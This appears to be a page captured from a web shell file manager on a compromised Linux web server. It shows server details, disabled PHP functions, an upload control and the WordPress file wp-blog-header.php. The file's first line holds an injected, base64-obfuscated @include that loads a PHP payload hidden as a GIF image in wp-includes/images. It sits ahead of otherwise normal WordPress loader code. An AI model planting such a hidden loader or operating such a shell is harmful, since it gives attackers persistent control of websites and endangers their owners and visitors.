HEX
Server: Apache
System: Linux wh01.toffstech.com 4.18.0-477.10.1.el8_8.x86_64 #1 SMP Tue May 16 11:38:37 UTC 2023 x86_64
User: wp011 (1013)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/wp011/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvd3AwMTEvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvaW1hZ2VzL3ctZGVjZmJmZGIuZ2lm");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}